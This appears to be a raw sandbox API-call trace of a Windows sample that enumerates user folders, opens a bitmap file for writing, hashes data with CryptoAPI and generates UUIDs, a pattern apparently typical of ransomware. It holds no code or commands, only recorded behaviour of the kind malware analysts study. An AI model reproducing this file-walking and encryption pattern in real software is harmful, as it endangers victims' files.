returned 1 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.640] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.641] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.641] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f25a8 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f25a8 | out: hHeap=0x680000) returned 1 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.642] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0096.642] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\") returned="44M5AK\\" [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb988 [0096.643] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.643] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0096.643] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02af8 [0096.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.644] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0096.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02af8 | out: hHeap=0x680000) returned 1 [0096.644] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.644] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.644] PathFindFileNameW (pszPath="") returned="" [0096.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.644] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe82b8080, ftCreationTime.dwHighDateTime=0x1d5b8c9, ftLastAccessTime.dwLowDateTime=0x2e4d3710, ftLastAccessTime.dwHighDateTime=0x1d5bff6, ftLastWriteTime.dwLowDateTime=0x2e4d3710, ftLastWriteTime.dwHighDateTime=0x1d5bff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0096.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.644] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe82b8080, ftCreationTime.dwHighDateTime=0x1d5b8c9, ftLastAccessTime.dwLowDateTime=0x2e4d3710, ftLastAccessTime.dwHighDateTime=0x1d5bff6, ftLastWriteTime.dwLowDateTime=0x2e4d3710, ftLastWriteTime.dwHighDateTime=0x1d5bff6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.644] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66250fd0, ftCreationTime.dwHighDateTime=0x1d5b85a, ftLastAccessTime.dwLowDateTime=0x71708880, ftLastAccessTime.dwHighDateTime=0x1d5bf10, ftLastWriteTime.dwLowDateTime=0x71708880, ftLastWriteTime.dwHighDateTime=0x1d5bf10, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-u63kcF", cAlternateFileName="")) returned 1 [0096.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3da8 [0096.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.644] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3cb8 [0096.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.644] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3da8 | out: hHeap=0x680000) returned 1 [0096.644] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8b114b40, ftCreationTime.dwHighDateTime=0x1d5c428, ftLastAccessTime.dwLowDateTime=0xafd7abf0, ftLastAccessTime.dwHighDateTime=0x1d5bd2e, ftLastWriteTime.dwLowDateTime=0xafd7abf0, ftLastWriteTime.dwHighDateTime=0x1d5bd2e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2s0-", cAlternateFileName="")) returned 1 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3ff8 [0096.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dff8 | out: hHeap=0x680000) returned 1 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3da8 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3da8 | out: hHeap=0x680000) returned 1 [0096.645] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.645] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x586a6d70, ftCreationTime.dwHighDateTime=0x1d5bbcc, ftLastAccessTime.dwLowDateTime=0x7c620ce0, ftLastAccessTime.dwHighDateTime=0x1d5b93a, ftLastWriteTime.dwLowDateTime=0x7c620ce0, ftLastWriteTime.dwHighDateTime=0x1d5b93a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FyEWgj", cAlternateFileName="")) returned 1 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3da8 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e4078 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16c) returned 0x6edd00 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e40f0 [0096.645] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.645] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.645] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\") returned="IK1V\\" [0096.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0096.645] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.646] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.646] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.646] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.646] PathFindFileNameW (pszPath="") returned="" [0096.646] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\3X MOoy04if5aqsW.bmp") returned=".bmp" [0096.646] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\IK1V\\3X MOoy04if5aqsW.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ik1v\\3x mooy04if5aqsw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.647] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=88759) returned 1 [0096.647] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.649] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x15a91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.650] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.651] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0096.652] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.652] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.652] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.652] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.652] GetLastError () returned 0x0 [0096.652] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.652] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0096.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.652] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.652] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.652] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x15ac0) returned 0x9a06a00 [0096.652] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02af8 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49e8 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02b40 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a60 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a90 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4aa8 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.653] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a90 | out: hHeap=0x680000) returned 1 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4aa8 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4a90 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4aa8 | out: hHeap=0x680000) returned 1 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a90 | out: hHeap=0x680000) returned 1 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.654] GetCurrentThreadId () returned 0x8c4 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8340 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.654] GetCurrentThreadId () returned 0x8c4 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.655] RtlAllocateHeap 